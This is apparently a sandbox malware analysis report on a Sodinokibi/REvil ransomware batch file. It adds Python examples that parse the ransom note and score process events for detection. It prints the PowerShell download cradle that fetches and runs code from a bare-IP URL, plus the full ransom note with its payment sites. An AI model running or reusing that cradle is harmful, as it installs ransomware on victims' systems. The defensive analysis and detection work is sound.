Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-09-2020 20:10

General

  • Target

    484333e52a633dd4ddba453c88728166.bat

  • Size

    220B

  • MD5

    78a20a9e11dcafee6975c27337f224f6

  • SHA1

    bf2f2d540d8c622f2c35950b2517e06bd1ffa085

  • SHA256

    bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913

  • SHA512

    206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab

Malware Config

Extracted

  • Language

    ps1

  • Source

    ps1.dropper

  • URLs

    http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166

Extracted

Path

C:\19887099q-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 19887099q. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CA0CFA7B45EE3878 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: PxSOabVFKvF13vcc1DGq7Vw+RSmXz1XiuDkezAkUNgdCm0YT+UHvKU0wN8z3UqxR 413IIlkfYzMa+NFtrd/E9RHW0zo92z+YIZylrRDPqPnCgNE2aGrVXAg7I/9dy1hM BLabKaFIBEho0Gz7gGSta06oUTlgCmjdgd7md2KIuHoUgPcSPLWZ/ZPmrz6crRX/ UdHxDt6kI3AS0caxPwiuRgYHKji8XctPDxJAJYmCnW0kKQdE1VPaR3dXphjujwAB LRL3DsWBJ2hnkW1qVRlE3MiPawamnWKmYbxHGMXfqD9NYk1lQ/4NV0auF1oEIS+X DnL5dpREobsd+JXB6rvCxidLLu6kY+L7+M3jrR2WiajTnyKXUfiTQBSQWT0Hw/wF S0vyl2d6EBACIwU1mWl31KUbXSqFNSVEz78AGC3VE4gJpRzynlwsu+mhd1+kMRl1 QlHMDsF0m3jrGqVw/BKP20HxUy8sCeLSrdTjRg7vOSSY6O55vmEgSYd4EQZw+d4N PjTZ2tGqxTyx0kNt0h3FW1w4KW2Hl999jGY5pMV+50upS0mn4FCqoC6KmMdAYHAF AE8471whT0K+AYUgaPNO5KLHNb0OOPaSzHZ7i/ucTDbo14R9nzxXDoVjh+BosQ7B ofLop36kR82UBkyL+ua8mnHRTQcTeR6gc3KhNcGNcvk6n/H9NMQNiiCfxZZ6r55I nupsNw321cM/t0rw6w8v0lbeb0MhzrZFcqKjBUmlIeR/4b+gnwdFcNuh8psp9060 PBVoiAxXDsAQelJlNCkIKtmPAvwzA5wWYXhW7EpZsuCK+E0k8K6T7OxtHHRI26Cv QlGAOX077CZD1oiChIBaIyNE6Ab5o5kT4r/RlShDZalBGvVoAsueo0Cuw8SvqTNh vVgFclBZQ4O4AOpLiyOm/4F3pEC+rYzoW9u3KJ+ypUIk76lS06Nmhz6EDSEgS8fA EfHsc+knk6EXwPri6ITlpLA2LOw2uiq1osCK8lMzYirBGsZe0A83Yw1F+agGw9wv Ix0DhTFlZJr9UX9O+IccsKYkPiSJHSLJS7Wzt25PfxQjUPZP0RcxjveS82nSQ8fW EjWr58WK4tDhzwUrfl4t5eEr7FJKXO6lHFdfMxcaPQbeDeOcva5liQBAFrWZTN+m yi11pZd4JvvOuZ6A3gQQqI80YbjPhOECVgHICc7Xkd51ojhJzfN/qnhwiNmVKdrO QyuJHynd4awLCWvgtpPc6Xmg0SUQ451UT/abVF7OSn9S0PQ8d4tc+3VSvcOZH1lQ US3p3OQ2vtjQKVXfGJVSAreVSPVHyQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878

http://decryptor.cc/CA0CFA7B45EE3878
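The config extractor pulled the note path, the family and the two payment URLs out of the ransom note; the per-victim values an incident responder actually wants as indicators are the extension named in the note, the victim ID at the end of both URLs, and the note filename (REvil writes "<extension>-readme.txt", which is why the extracted path is C:\19887099q-readme.txt). The following is an added example, not code from the sandbox or from any extractor it uses, that parses a note in this layout into those fields, checks that the key blob is well-formed base64, and confirms both URLs carry the same victim ID. The note text embedded in it is constructed from the fragments shown above; the onion address, the decryptor.cc URL, the victim ID and the extension are the ones the report shows, while the key blob is a placeholder (base64 of the bytes 0..63), not a real victim key.

```python
import base64
import re

# Constructed ransom note in the Sodinokibi/REvil layout. The onion address,
# decryptor.cc URL, victim ID and extension are the ones the report shows;
# the key blob is a placeholder (base64 of bytes 0..63), not a real key.
KEY_B64 = base64.b64encode(bytes(range(64))).decode()
_KEY_LINES = " ".join(KEY_B64[i:i + 44] for i in range(0, len(KEY_B64), 44))

SAMPLE_NOTE = (
    "---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, "
    "and currently unavailable. You can check it: all files on your system has "
    "extension 19887099q. [+] How to get access on website? [+] You have two ways: "
    "1) [Recommended] Using a TOR browser! a) Download and install TOR browser from "
    "this site: https://torproject.org/ b) Open our website: "
    "http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878 "
    "2) If TOR blocked in your country, try to use VPN! b) Open our secondary website: "
    "http://decryptor.cc/CA0CFA7B45EE3878 Warning: secondary website can be blocked. "
    "When you open our website, put the following data in the input form: Key: "
    + _KEY_LINES
    + " ------------------------------------------------------------------------ "
    "!!! DANGER !!! DONT try to change files by yourself."
)

# The extension is announced in prose; the victim ID is the last path element
# of the v3 onion URL (56 base32 characters); the key is everything between
# "Key:" and the dashed separator, wrapped across several lines.
_EXT = re.compile(r"\bextension\s+([0-9A-Za-z]+)")
_ONION = re.compile(r"https?://[a-z2-7]{16,56}\.onion/([0-9A-Fa-f]{8,})")
_SECONDARY = re.compile(r"secondary website:\s*(https?://\S+)", re.I)
_KEY = re.compile(r"\bKey:\s*(.+?)\s*-{5,}", re.S)


def parse_ransom_note(text):
    """Extract per-victim indicators from a note in the layout above."""
    ext = _EXT.search(text)
    onion = _ONION.search(text)
    secondary = _SECONDARY.search(text)
    key = _KEY.search(text)

    result = {
        "extension": ext.group(1) if ext else None,
        # REvil names the note "<extension>-readme.txt", matching the
        # extracted path C:\19887099q-readme.txt in the report.
        "readme_name": f"{ext.group(1)}-readme.txt" if ext else None,
        "onion_url": onion.group(0) if onion else None,
        "victim_id": onion.group(1) if onion else None,
        "secondary_url": secondary.group(1) if secondary else None,
        "key_b64": None,
        "key_len": None,
        "ids_match": False,
    }
    if key:
        # Strip the line wrapping, then insist on strict base64 so a truncated
        # or garbled note does not yield a bogus "key" indicator.
        blob = re.sub(r"\s+", "", key.group(1))
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a subclass of ValueError
            raw = None
        if raw:
            result["key_b64"] = blob
            result["key_len"] = len(raw)
    if result["victim_id"] and result["secondary_url"]:
        # Both payment URLs should end in the same victim ID; a mismatch means
        # the note was edited or mis-parsed.
        result["ids_match"] = result["secondary_url"].rstrip("/").endswith(
            "/" + result["victim_id"]
        )
    return result


if __name__ == "__main__":
    for k, v in parse_ransom_note(SAMPLE_NOTE).items():
        print(f"{k:14} {v}")
```

The extension and readme name give you the file-system hunt (`*.19887099q` and `19887099q-readme.txt` on every share), the victim ID ties a note found on one host to the rest of the same intrusion, and the base64 check is what stops a half-overwritten note from polluting the indicator set.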

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 38 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3944
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:628
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3084
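The process tree above is a one-line download cradle: cmd.exe runs the .bat from the user's Temp directory, which launches the 32-bit PowerShell host from SysWOW64 on a 64-bit Windows 10, fetches a script body from a bare-IP paste URL with DownloadString, evaluates it with IEX, calls a randomly named function, and then sleeps for 10000 seconds so the host stays alive while the payload runs. Below is an added detection example, not part of the sandbox report, that scores Sysmon-style process-creation events against those traits. The two malicious command lines are copied from the process tree above; the event layout, explorer.exe as the parent of cmd.exe, the two benign decoy command lines, the indicator names and the alert threshold are all constructed for illustration.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields), not
# telemetry from the sandbox report. The first two CommandLine values are
# copied from the process tree above; explorer.exe as the parent of cmd.exe
# and the two benign decoys are assumptions for illustration.
SAMPLE_EVENTS = [
    {
        "ProcessId": 3888,
        "Image": r"C:\Windows\system32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"',
    },
    {
        "ProcessId": 3944,
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\system32\cmd.exe",
        "CommandLine": (
            r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
            r'"IEX (New-Object System.Net.WebClient).DownloadString('
            r"'http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');"
            r'Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"'
        ),
    },
    {
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    },
    {
        "ProcessId": 4120,
        "Image": r"C:\Windows\system32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"C:\Windows\system32\cmd.exe /c dir C:\Users\Admin\Documents",
    },
]

_WOW64_PS = re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.I)
_IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
_CRADLE = re.compile(
    r"\.downloadstring\(|\.downloadfile\(|\.downloaddata\(|\binvoke-webrequest\b|\biwr\b", re.I
)
_BARE_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I)
_SLEEP = re.compile(r"start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)
# Heuristic: real cmdlets are PascalCase; an all-caps noun of 8+ letters is the
# random name a generator emits (Invoke-ZRFBQPCGMEHHZ in the tree above).
_OPAQUE_FN = re.compile(r"\bInvoke-[A-Z]{8,}\b")
_BAT_FROM_TEMP = re.compile(r'(?:\\Temp\\|\\Downloads\\|%temp%)[^"]*\.(?:bat|cmd)\b', re.I)


def score_event(event):
    """Return the names of every indicator a single process-creation event trips."""
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    hits = []
    if _WOW64_PS.search(image):
        hits.append("wow64_powershell")        # 32-bit host on a 64-bit OS
    if _IEX.search(cmd):
        hits.append("invoke_expression")
    if _CRADLE.search(cmd):
        hits.append("download_cradle")
    if _BARE_IP_URL.search(cmd):
        hits.append("bare_ip_url")             # no hostname, just an IP
    m = _SLEEP.search(cmd)
    if m and int(m.group(1)) >= 600:
        hits.append("long_sleep")              # keeps the host alive for the payload
    if _OPAQUE_FN.search(cmd):
        hits.append("opaque_invoke")
    if parent.lower().endswith("\\cmd.exe") and image.lower().endswith("\\powershell.exe"):
        hits.append("cmd_spawns_powershell")
    if _BAT_FROM_TEMP.search(cmd):
        hits.append("bat_from_temp")
    return hits


def find_suspicious(events, threshold=3):
    """Return (ProcessId, hits) for events tripping at least `threshold` indicators."""
    return [(ev["ProcessId"], h) for ev in events if len(h := score_event(ev)) >= threshold]


if __name__ == "__main__":
    for pid, hits in find_suspicious(SAMPLE_EVENTS):
        print(pid, ", ".join(hits))
```

No single indicator here is enough on its own (administrators do run 32-bit PowerShell, and Start-Sleep is common in scheduled jobs); the value is in the combination, which is why the cradle trips seven of the eight checks while the cmd.exe parent, which only runs a .bat from Temp, stays below the threshold and is left to be correlated with its child.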

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3944-0-0x0000000000000000-mapping.dmp

  • memory/3944-1-0x0000000074080000-0x000000007476E000-memory.dmp

    Filesize

    6.9MB

  • memory/3944-2-0x00000000069A0000-0x00000000069A1000-memory.dmp

    Filesize

    4KB

  • memory/3944-3-0x0000000007010000-0x0000000007011000-memory.dmp

    Filesize

    4KB

  • memory/3944-4-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

    Filesize

    4KB

  • memory/3944-5-0x0000000006E70000-0x0000000006E71000-memory.dmp

    Filesize

    4KB

  • memory/3944-6-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

    Filesize

    4KB

  • memory/3944-7-0x0000000007640000-0x0000000007641000-memory.dmp

    Filesize

    4KB

  • memory/3944-8-0x0000000006E00000-0x0000000006E01000-memory.dmp

    Filesize

    4KB

  • memory/3944-9-0x0000000006E20000-0x0000000006E21000-memory.dmp

    Filesize

    4KB

  • memory/3944-10-0x0000000007C50000-0x0000000007C51000-memory.dmp

    Filesize

    4KB

  • memory/3944-11-0x0000000009380000-0x0000000009381000-memory.dmp

    Filesize

    4KB

  • memory/3944-12-0x00000000088F0000-0x00000000088F1000-memory.dmp

    Filesize

    4KB